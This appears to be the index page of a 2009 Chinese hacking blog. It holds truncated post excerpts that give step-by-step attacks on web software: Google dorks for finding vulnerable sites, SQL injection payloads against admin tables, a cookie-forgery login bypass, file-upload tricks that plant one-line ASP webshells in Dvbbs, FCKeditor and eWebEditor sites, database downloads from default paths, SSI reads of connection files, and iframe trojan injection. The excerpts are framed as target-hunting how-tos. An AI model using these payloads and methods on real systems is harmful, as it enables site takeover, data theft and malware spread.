2009-11-29 20:07
2009-11-28 17:58
以下代码保存成 下载者.hta
双击打开

<HTA:APPLICATION
ID="xmldown"
Caption="yes"
S |
2009-11-28 17:56
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
把strSQL = "s
|
2009-11-28 17:53
通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER- |
2009-11-28 17:47
雷池也是此类编辑器
这个编辑器相当的简陋,下午拿站的时候碰到了一个,没有数据库备份,也没有什么可以直接上传webshell的地方,简陋到只有一个editor的界面。

简单说下利用的方法吧。
点击图片上传后会出现上传页面,地址为
http://www. |
2009-11-28 10:47
google 搜索关键词 : powered by dvbbs 8.2
找一个目标, 先注册个用户, 注册好后,点击,论坛工具-我的主页-
进入用户个人主页配置,点击 个人空间管理。
给现有的标题随便取一个名字。
接下来点 自定义风格-依旧在 样。式风格css修改。 里随意输入几个字符,保存设置
成功后页面样式就会有所变化。
点击文件管理。上传以‘x.asp;x.jpg’格式的asp一句话木马,
通过点击上传的文件,可以直接得到ASP一句话木马的URL路径,这样一个webshell就到手了。
目前微软好像还没有相应的 |
2009-11-27 12:38
对Fckeditor的一些漏洞总结当然这都是网上公开过的....这次把他总结出来..放到blog上希望对大家有所帮助
| |
2009-11-27 00:03
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
以下本文总结来自黑防去年第9期杂志上的内容...
先说一个注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
这里一个注入
|
2009-11-26 12:44
找到注入点
www.xxx.com/asp?id=2 存在注入点
www.xxx.com/asp?id=2 长度为15
www.xxx.com/asp?id=2 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin 表为admin
只猜出 username 字段却不知道密码字段
www.xxx.com/asp?id=2 and 1=2 union sel |
2009-11-21 14:35
# 鬼仔:最近比较忙,有时候更新比较少,以后会像以前一样的。
作者:lcx
这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。
一、利用htc文件来加载if |
2009-11-20 11:18

11月杂志目录
========
新闻时评
2 颠覆杀毒市场,360强势插入!
策划
7 功夫熊猫Hacker系漫游记4 |
2009-11-20 11:17
通杀,杀官方
搜:Powered By WRMPS
1.注册-列目录
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
这个利用不大 ,密码只取MD5前十位,2B得很.
2.COOKIE欺骗进后台
admin/admin_main.asp or admin/admin_menu.asp
admin=ManageCode=WRMPS6&admin=a' or '1'='1&pass=a' or '1'='1&flag=,&FlagGroup=0
有些后台不需要认证码ManageCode=默认WRMPS6,如果改了就 |
2009-11-20 11:14
第一步,搜索攻击目标
打开搜索引擎,搜索“Pragram by Dlog”,可以找到许多博客页面,这些博客都是使用“Dlog破废墟修改版”建立的。我们要找的叶面是存在暴库的1.2版本。许多用户都忽视了这个版本中内嵌的eWebEditor在线编辑数据库的安全性,致使可以使用默认的路径进行下载。
第二步,获取管理员密码
在搜索结果列表中挑一个攻击目标:http://s*.8888.com/blog/,用浏览器打开这个地址,在后面加上eWebEditor/db/e/eWebEditor.mdb并回车,下载数据库。
打 |
2009-11-20 11:06
●YXBBS论坛系统后台拿shell
昨晚无聊,在帮朋友看一个站过程中碰到了个网站。论坛YxBbS2.3版,管理员弱口令admin admin/很容易就到了后台。进去之后,既没有备份,上传文件类型cer,asa,php等都被过滤了(在Saveupload.asp)

|
2009-11-16 13:05
方法:上传一个shtm文件, 内容为:<!--#include file="conn.asp"-->
直接请求这个shtm文件,conn.asp就一览无遗, 数据库路径也就到手啦
解析:<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"conn.asp"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示conn.asp其中的内容.
前提:服务器的对shtm或者shtml的扩展没有删除
后记:至于conn.asp可以为其他,比如config.inc.php config.aspx 等一些数据配置文件
|
|
|
|